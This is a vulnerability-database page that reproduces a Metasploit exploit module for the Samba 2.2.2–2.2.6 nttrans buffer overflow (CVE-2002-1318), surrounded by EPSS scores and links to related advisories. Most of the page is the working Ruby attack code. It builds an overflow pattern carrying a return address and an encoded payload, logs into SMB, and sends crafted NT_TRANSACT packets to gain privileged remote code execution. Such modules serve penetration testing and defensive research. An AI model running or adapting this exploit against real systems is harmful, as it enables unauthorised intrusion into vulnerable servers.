Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-27398
HistoryMar 23, 2017 - 12:00 a.m.

Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow Exploit

2017-03-2300:00:00
metasploit
0day.today
30

0.095 Low

EPSS

Percentile

94.2%

JSON

Exploit for multiple platform in category remote exploits

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking
 
  include Msf::Exploit::Remote::SMB::Client
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
      'Description'    => %q{
          This module attempts to exploit a buffer overflow vulnerability present in
        versions 2.2.2 through 2.2.6 of Samba.
        The Samba developers report this as:
        "Bug in the length checking for encrypted password change requests from clients."
        The bug was discovered and reported by the Debian Samba Maintainers.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2002-1318' ],
          [ 'OSVDB', '14525' ],
          [ 'BID', '6210' ],
          [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'MinNops'  => 512,
        },
      'Targets'        =>
        [
          [ "Samba 2.2.x Linux x86",
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'Rets' => [0x01020304, 0x41424344],
            },
          ],
        ],
      'DisclosureDate' => 'Apr 7 2003'
      ))
 
    register_options(
      [
        Opt::RPORT(139)
      ], self.class)
  end
 
  def exploit
 
    # 0x081fc968
 
    pattern = Rex::Text.pattern_create(12000)
 
    pattern[532, 4] = [0x81b847c].pack('V')
    pattern[836, payload.encoded.length] = payload.encoded
 
    # 0x081b8138
 
    connect
    smb_login
 
    targ_address = 0xfffbb7d0
 
    #
    # Send a NTTrans request with ParameterCountTotal set to the buffer length
    #
 
    subcommand   = 1
    param        = ''
    body         = ''
    setup_count  = 0
    setup_data   = ''
    data = param + body
 
    pkt = CONST::SMB_NTTRANS_PKT.make_struct
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])
 
    base_offset = pkt.to_s.length + (setup_count * 2) - 4
    param_offset = base_offset
    data_offset = param_offset + param.length
 
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001
    pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
 
    pkt['Payload'].v['ParamCountTotal'] =12000
    pkt['Payload'].v['DataCountTotal'] = body.length
    pkt['Payload'].v['ParamCountMax'] = 1024
    pkt['Payload'].v['DataCountMax'] = 65504
    pkt['Payload'].v['ParamCount'] = param.length
    pkt['Payload'].v['ParamOffset'] = param_offset
    pkt['Payload'].v['DataCount'] = body.length
    pkt['Payload'].v['DataOffset'] = data_offset
    pkt['Payload'].v['SetupCount'] = setup_count
    pkt['Payload'].v['SetupData'] = setup_data
    pkt['Payload'].v['Subcommand'] = subcommand
 
    pkt['Payload'].v['Payload'] = data
 
    self.simple.client.smb_send(pkt.to_s)
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
 
    #
    # Send a NTTrans secondary request with the magic displacement
    #
 
    param = pattern
    body  = ''
    data  = param + body
 
    pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])
 
    base_offset = pkt.to_s.length - 4
    param_offset = base_offset
    data_offset = param_offset + param.length
 
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001
    pkt['Payload']['SMB'].v['WordCount'] = 18
 
    pkt['Payload'].v['ParamCountTotal'] = param.length
    pkt['Payload'].v['DataCountTotal'] = body.length
    pkt['Payload'].v['ParamCount'] = param.length
    pkt['Payload'].v['ParamOffset'] = param_offset
    pkt['Payload'].v['ParamDisplace'] = targ_address
    pkt['Payload'].v['DataCount'] = body.length
    pkt['Payload'].v['DataOffset'] = data_offset
 
    pkt['Payload'].v['Payload'] = data
 
    self.simple.client.smb_send(pkt.to_s)
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
 
 
    handler
 
  end
 
end

#  0day.today [2018-03-13]  #

Related

nessus 3
cve 1
openvas 2
osv 1
debiancve 1
suse 1
cert 2
nessus
nessus
Samba Encrypted Password String Conversion Decryption Overflow
2002-11-25 00:00:00
Mandrake Linux Security Advisory : samba (MDKSA-2002:081)
2004-07-31 00:00:00
Debian DSA-200-1 : samba - remote exploit
2004-09-29 00:00:00
cve
cve
CVE-2002-1318
2002-12-11 05:00:00
openvas
openvas
Debian Security Advisory DSA 200-1 (samba)
2008-01-17 00:00:00
Debian Security Advisory DSA 200-1 (samba)
2008-01-17 00:00:00
osv
osv
samba - remote exploit
2002-11-22 00:00:00
debiancve
debiancve
CVE-2002-1318
2002-12-11 05:00:00
suse
suse
possible remote code execution in samba
2002-11-20 17:05:56
cert
cert
Samba contains a remotely exploitable stack buffer overflow
2002-12-13 00:00:00
Sendmail vulnerable to buffer overflow when DNS map is specified using TXT records
2002-06-28 00:00:00

0.095 Low

EPSS

Percentile

94.2%

JSON
Related for 1337DAY-ID-27398
nessus3cve1openvas2osv1debiancve1suse1cert2